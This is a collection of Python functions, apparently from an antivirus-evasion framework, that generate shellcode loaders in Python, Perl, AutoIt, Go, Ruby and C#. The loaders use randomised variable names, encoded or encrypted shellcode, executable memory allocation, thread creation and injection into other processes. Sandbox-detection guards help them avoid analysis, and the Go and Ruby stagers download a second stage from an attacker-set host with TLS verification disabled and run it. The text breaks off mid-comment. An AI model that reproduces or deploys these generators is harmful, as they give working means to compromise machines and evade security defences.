def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('latin-1') Shellcode = Shellcode.decode('unicode_escape') # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # Generate Random Variable Names ShellcodeVariableName = evasion_helpers.randomString() RandPtr = evasion_helpers.randomString() RandHt = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() num_tabs_required = 0 payload_code = '' payload_code, num_tabs_required = gamemaker.senecas_games(self) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + 
randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # How I'm tracking the number of nested tabs needed # to make the payload num_ends_required = 0 payload_code = "use Win32::API;\n" # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode payload_code2, num_ends_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # randomly generate variable names shellcode_variable = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() rand_valloc = evasion_helpers.randomString() rand_movemem = evasion_helpers.randomString() rand_cthread = evasion_helpers.randomString() rand_waitfor = evasion_helpers.randomString() rand_heapcreate = evasion_helpers.randomString() rand_heapalloc = evasion_helpers.randomString() rand_thread = evasion_helpers.randomString() payload_code += '\t' * num_ends_required + "my $%s = \"%s\";\n" % (shellcode_variable, Shellcode) payload_code += '\t' * num_ends_required + "$" + rand_movemem + " = new Win32::API('kernel32', 'RtlMoveMemory', 'IPI', 'V');\n" payload_code += '\t' * num_ends_required + "$" + rand_cthread + " = new Win32::API('kernel32', 'CreateThread', 'IIIIIP', 'I');\n" payload_code += '\t' * num_ends_required + "$" + rand_waitfor + " = new Win32::API('kernel32', 'WaitForSingleObject', 'II', 'I');\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_ends_required + "$" + rand_valloc + " = new Win32::API('kernel32', 'VirtualAlloc', 'IIII', 'I');\n" payload_code += '\t' * num_ends_required + "my $" + ptrName + " = $" + rand_valloc + "->Call(0, length($" + shellcode_variable + "), 0x1000, 0x40);\n" elif 
self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heapcrout = evasion_helpers.randomString() payload_code += '\t' * num_ends_required + "$" + rand_heapcreate + " = new Win32::API('kernel32', 'HeapCreate', 'III', 'I');\n" payload_code += '\t' * num_ends_required + "$" + rand_heapalloc + " = new Win32::API('kernel32', 'HeapAlloc', 'III', 'I');\n" payload_code += '\t' * num_ends_required + "my $" + rand_heapcrout + " = $" + rand_heapcreate + "->Call(0x00040000, length(" + shellcode_variable + ")*2, 0);\n" payload_code += '\t' * num_ends_required + "my $" + ptrName + " = $" + rand_heapalloc + "->Call($" + rand_heapcrout + ", 0x00000008, length(" + shellcode_variable + "));\n" payload_code += '\t' * num_ends_required + "$" + rand_movemem + "->Call($%s, $%s, length($%s));\n" % (ptrName, shellcode_variable, shellcode_variable ) payload_code += '\t' * num_ends_required + "my $" + rand_thread + " = $" + rand_cthread + "->Call(0, 0, $%s, 0, 0, 0);\n" % (ptrName) payload_code += '\t' * num_ends_required + "$" + rand_waitfor + "->Call($" + rand_thread + ", -1);\n" payload_code += '}\n' * num_ends_required self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # get it in AutoITs format Shellcode = "0x" + "".join(Shellcode.split("\\x")) total_size = len(Shellcode) RandFuncName = evasion_helpers.randomString() RandArgName = evasion_helpers.randomString() RandASMVarName = evasion_helpers.randomString() RandASMBufferName = evasion_helpers.randomString() RandBinBufferName = evasion_helpers.randomString() length_limit = 4000 # keep that pesky tray icon from appearing payload_code = "#NoTrayIcon\n" payload_code += RandFuncName + '(fileread("%WinDir%\\system32\\calc.exe"))\n' payload_code += 'Func ' + RandFuncName + '($' + RandArgName + ')\n' if total_size > length_limit: all_lines = [ Shellcode[i:i + length_limit] for i in range(0, len(Shellcode), length_limit) ] first_run = True for line in all_lines: if first_run: payload_code += '\tLocal $' + RandASMVarName + '="' + line + '"\n' first_run = False else: payload_code += '\t$' + RandASMVarName + ' = $' + RandASMVarName + ' & "' + line + '"\n' else: payload_code += '\tLocal $' + RandASMVarName + '="' + Shellcode + '"\n' payload_code += '\tLocal $' + RandASMBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandASMVarName + ') & "]")\n' payload_code += '\tLocal $' + RandBinBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandArgName + ') & "]")\n' payload_code += '\tDllStructSetData($' + RandASMBufferName + ', 1, $' + RandASMVarName + ')\n' payload_code += '\tDllStructSetData($' + RandBinBufferName + ', 1, $' + RandArgName + ')\n' payload_code += '\tLocal $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($' + 
RandASMBufferName + '), "ptr", DllStructGetPtr($' + RandBinBufferName + '), "int", 0, "int", 0, "int", 0)\n' payload_code += "EndFunc\n" self.payload_source_code = payload_code return
def system_checks(self): rand_username = evasion_helpers.randomString() rand_error1 = evasion_helpers.randomString() rand_hostname = evasion_helpers.randomString() rand_error2 = evasion_helpers.randomString() rand_processor = evasion_helpers.randomString() rand_domain = evasion_helpers.randomString() rand_error3 = evasion_helpers.randomString() num_ends = 0 check_code = '' if self.required_options["USERNAME"][0].lower() != "x": check_code += rand_username + ", " + rand_error1 + " := user.Current()\n" check_code += "if " + rand_error1 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + self.required_options[ "USERNAME"][0] + "\")) {\n" num_ends += 1 if self.required_options["HOSTNAME"][0].lower() != "x": check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n" check_code += "if " + rand_error2 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + self.required_options[ "HOSTNAME"][0] + "\")) {\n" num_ends += 1 if self.required_options["PROCESSORS"][0].lower() != "x": check_code += rand_processor + " := runtime.NumCPU()\n" check_code += "if " + rand_processor + " >= " + self.required_options[ "PROCESSORS"][0] + " {\n" num_ends += 1 return check_code, num_ends
def generate(self): payload_code, num_tabs_required = gamemaker.senecas_games(self) # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Generate Random Variable Names ShellcodeVariableName = evasion_helpers.randomString() pid_num_variable = evasion_helpers.randomString() pagerwx_variable = evasion_helpers.randomString() processall_variable = evasion_helpers.randomString() memcommit_variable = evasion_helpers.randomString() shell_length_variable = evasion_helpers.randomString() memalloc_variable = evasion_helpers.randomString() prochandle_variable = evasion_helpers.randomString() kernel32_variable = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * num_tabs_required + 'from ctypes import *\n' payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n' payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n' payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n' payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n' payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options[ "PID_NUMBER"][0] + '\n' payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n' payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n' payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + 
'.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n' payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n' payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def buildAryaLauncher(raw): """ Takes a raw set of bytes and builds a launcher shell to b64decode/decrypt a string rep of the bytes, and then use reflection to invoke the original .exe """ # the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random())) base64payload = b64sub(raw, key) payload_code = "using System; using System.Collections.Generic; using System.Text;" payload_code += "using System.IO; using System.Reflection; using System.Linq;\n" decodeFuncName = evasion_helpers.randomString() baseStringName = evasion_helpers.randomString() targetStringName = evasion_helpers.randomString() dictionaryName = evasion_helpers.randomString() # build out the letter sub decrypt function payload_code += "namespace %s { class %s { private static string %s(string t, string k) {\n" % (evasion_helpers.randomString(), evasion_helpers.randomString(), decodeFuncName) payload_code += "string %s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n" % (baseStringName) payload_code += "string %s = \"\"; Dictionary<char, char> %s = new Dictionary<char, char>();\n" % (targetStringName, dictionaryName) payload_code += "for (int i = 0; i < %s.Length; ++i){ %s.Add(k[i], %s[i]); }\n" % (baseStringName, dictionaryName,baseStringName) payload_code += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { %s += %s[t[i]];}\n" % (targetStringName, dictionaryName) payload_code += "else { %s += t[i]; }} return %s; }\n" % (targetStringName, targetStringName) base64PayloadName = evasion_helpers.randomString() assemblyName = evasion_helpers.randomString() # build out Main() assemblyName = evasion_helpers.randomString() methodInfoName = evasion_helpers.randomString() keyName = evasion_helpers.randomString() payload_code += "static void Main() {\n" payload_code += "string %s = \"%s\";\n" % (base64PayloadName, base64payload) payload_code += 
"string %s = \"%s\";\n" % (keyName, key) # load up the assembly of the decoded binary payload_code += "Assembly %s = Assembly.Load(Convert.FromBase64String(%s(%s, %s)));\n" % (assemblyName, decodeFuncName, base64PayloadName, keyName) payload_code += "MethodInfo %s = %s.EntryPoint;\n" % (methodInfoName, assemblyName) # use reflection to jump to its entry point payload_code += "%s.Invoke(%s.CreateInstance(%s.Name), null);\n" % (methodInfoName, assemblyName, methodInfoName) payload_code += "}}}\n" return payload_code
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # get it in AutoITs format Shellcode = "0x" + "".join(Shellcode.split("\\x")) RandFuncName = evasion_helpers.randomString() RandArgName = evasion_helpers.randomString() RandASMVarName = evasion_helpers.randomString() RandASMBufferName = evasion_helpers.randomString() RandBinBufferName = evasion_helpers.randomString() # keep that pesky tray icon from appearing payload_code = "#NoTrayIcon\n" payload_code += RandFuncName + '(fileread("%WinDir%\\system32\\calc.exe"))\n' payload_code += 'Func ' + RandFuncName + '($' + RandArgName + ')\n' payload_code += '\tLocal $' + RandASMVarName + '="' + Shellcode + '"\n' payload_code += '\tLocal $' + RandASMBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandASMVarName + ') & "]")\n' payload_code += '\tLocal $' + RandBinBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandArgName + ') & "]")\n' payload_code += '\tDllStructSetData($' + RandASMBufferName + ', 1, $' + RandASMVarName + ')\n' payload_code += '\tDllStructSetData($' + RandBinBufferName + ', 1, $' + RandArgName + ')\n' payload_code += '\tLocal $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($' + RandASMBufferName + '), "ptr", DllStructGetPtr($' + RandBinBufferName + '), "int", 0, "int", 0, "int", 0)\n' payload_code += "EndFunc\n" self.payload_source_code = payload_code return
def generate(self): # Generate the variable names randctypes = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode payload_code, num_tabs_required = gamemaker.senecas_games(self) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + 
rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): memCommit = evasion_helpers.randomString() memReserve = evasion_helpers.randomString() pageExecRW = evasion_helpers.randomString() kernel32 = evasion_helpers.randomString() procVirtualAlloc = evasion_helpers.randomString() base64Url = evasion_helpers.randomString() virtualAlloc = evasion_helpers.randomString() size = evasion_helpers.randomString() allocvarout = evasion_helpers.randomString() err = evasion_helpers.randomString() randBase = evasion_helpers.randomString() length = evasion_helpers.randomString() foo = evasion_helpers.randomString() random = evasion_helpers.randomString() outp = evasion_helpers.randomString() i = evasion_helpers.randomString() randTextBase64URL = evasion_helpers.randomString() getURI = evasion_helpers.randomString() sumVar = evasion_helpers.randomString() checksum8 = evasion_helpers.randomString() uri = evasion_helpers.randomString() value = evasion_helpers.randomString() tr = evasion_helpers.randomString() client = evasion_helpers.randomString() hostAndPort = evasion_helpers.randomString() port = self.required_options["LPORT"][0] host = self.required_options["LHOST"][0] response = evasion_helpers.randomString() uriLength = randint(5, 255) payload = evasion_helpers.randomString() bufferVar = evasion_helpers.randomString() x = evasion_helpers.randomString() heapcreatevariable = evasion_helpers.randomString() heapallocvariable = evasion_helpers.randomString() heapcreateout = evasion_helpers.randomString() cust_func = evasion_helpers.randomString() errorvariable = evasion_helpers.randomString() errorvariabledos = evasion_helpers.randomString() # sandbox check code sandbox_checks, num_curlys = gamemaker.senecas_games(self) # Todo: randomize import order payload_code = "package main\nimport (\n\"syscall\"\n\"unsafe\"\n" payload_code += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n\"crypto/tls\"\n" if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += "\"runtime\"\n" # Add in other imports 
based on checks being performed if self.required_options["USERNAME"][0].lower() != "x": payload_code += "\"strings\"\n\"os\"\n\"os/user\"\n" if self.required_options["HOSTNAME"][0].lower() != "x": if "strings" not in payload_code: payload_code += "\"strings\"\n" if "os" not in payload_code: payload_code += "\"os\"\n" payload_code += ")\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "const (\n" payload_code += "%s = 0x1000\n" % (memCommit) payload_code += "%s = 0x2000\n" % (memReserve) payload_code += "%s = 0x40\n)\n" % (pageExecRW) payload_code += "var (\n" payload_code += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n" % ( base64Url) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" % ( kernel32) payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n)\n" % ( procVirtualAlloc, kernel32) payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % ( cust_func, size) payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" % ( allocvarout, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW) payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % ( allocvarout, err, allocvarout) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n" payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n" payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n" payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % ( cust_func, size) payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n" payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n" payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" 
% ( allocvarout, err, allocvarout) payload_code += "func %s(%s int, %s []byte) string {\n" % (randBase, length, foo) payload_code += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" % ( random) payload_code += "var %s []byte\n" % (outp) payload_code += "for %s := 0; %s < %s; %s++ {\n" % (i, i, length, i) payload_code += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" % ( outp, outp, foo, random, foo) payload_code += "return string(%s)\n}\n" % (outp) payload_code += "func %s(%s int) string {\n" % (randTextBase64URL, length) payload_code += "%s := []byte(%s)\n" % (foo, base64Url) payload_code += "return %s(%s, %s)\n}\n" % (randBase, length, foo) payload_code += "func %s(%s, %s int) string {\n" % (getURI, sumVar, length) payload_code += "for {\n%s := 0\n%s := %s(%s)\n" % ( checksum8, uri, randTextBase64URL, length) payload_code += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" % ( value, uri, checksum8, value) payload_code += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" % ( checksum8, '%0x100', sumVar, uri) payload_code += "func main() {\n" # Sandbox code goes here if sandbox_checks != '': payload_code += sandbox_checks payload_code += "%s := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}\n" % ( tr) payload_code += "%s := http.Client{Transport: %s}\n" % (client, tr) payload_code += "%s := \"https://%s:%s\"\n" % (hostAndPort, host, port) payload_code += "%s, _ := %s.Get(%s + %s(92, %s))\n" % ( response, client, hostAndPort, getURI, uriLength) payload_code += "defer %s.Body.Close()\n" % (response) payload_code += "%s, _ := ioutil.ReadAll(%s.Body)\n" % (payload, response) payload_code += "%s, _ := %s(uintptr(len(%s)))\n" % ( allocvarout, cust_func, payload) payload_code += "%s := (*[990000]byte)(unsafe.Pointer(%s))\n" % ( bufferVar, allocvarout) payload_code += "for %s, %s := range %s {\n" % (x, value, payload) payload_code += "%s[%s] = %s\n}\n" % (bufferVar, x, value) payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % 
(allocvarout) payload_code += '}' * num_curlys self.payload_source_code = payload_code return
def generate(self): payload_code = '' payload_code = "require 'rubygems';require 'uri';require 'win32/api';require 'net/https';require 'openssl';include Win32\n" # Add logic for adding this line, stupid bug and I have no idea # why this is even a problem, but ruby is dumb if self.required_options["HOSTNAME"][0] != "X" or self.required_options[ "DOMAIN"][0] != "X" or self.required_options["USERNAME"][ 0] != "X" or self.required_options["SLEEP"][0] != "X": pass else: payload_code += "exit if Object.const_defined?(:Ocra)\n" if self.required_options["HOSTNAME"][ 0] != "X" or self.required_options["DOMAIN"][0] != "X": payload_code += 'require \'socket\'\n' payload_code2, num_ends_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # randomly generate out variable names ptrName = evasion_helpers.randomString() threadName = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() valloc_random = evasion_helpers.randomString() rtlmove_random = evasion_helpers.randomString() createthread_random = evasion_helpers.randomString() waitfor_random = evasion_helpers.randomString() heapcreate_random = evasion_helpers.randomString() heapalloc_random = evasion_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" 
payload_code += "def ch()\n" #payload_code += "\tchk = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n" #payload_code += "\t32.times do\n" #payload_code += "\t\turi = chk.sample(3).join()\n" #payload_code += "\t\tchk.sort_by {rand}.each do |x|\n" #payload_code += "\t\t\treturn(uri + x) if (uri + x).unpack(\"C*\").inject(:+) % 0x100 == 92\n" #payload_code += "\t\tend\n" #payload_code += "\tend\n" payload_code += "\treturn \"WEZf\"\n" payload_code += "end\n" payload_code += "def ij(sc)\n" payload_code += "\tif sc.length > 1000\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? 
sc.length : 0x1000), 0)\n" payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n" payload_code += "\tend\nend\n" payload_code += "uri = URI.parse(\"https://%s:%s/#{ch()}\")\n" % ( self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += "http = Net::HTTP.new(uri.host, uri.port)\n" payload_code += "http.use_ssl = true\n" payload_code += "http.verify_mode = OpenSSL::SSL::VERIFY_NONE\n" payload_code += "request = Net::HTTP::Get.new(uri.request_uri)\n" payload_code += "response = http.request(request)\n" payload_code += "ij(response.body)\n" # Close out all the if statements for iteration in range(num_ends_required): payload_code += 'end\n' self.payload_source_code = payload_code return
# senecas_games(evasion_payload) -> (check_code: str, num_tabs_required: int)
#
# Builds the source text of the environment-guard conditionals that wrap a
# generated payload, written in the payload's own language
# (evasion_payload.language: 'python', 'ruby', 'perl', 'powershell', 'cs',
# 'go'). Every option in evasion_payload.required_options whose value is not
# the "x"/"X" sentinel opens one nested conditional and bumps
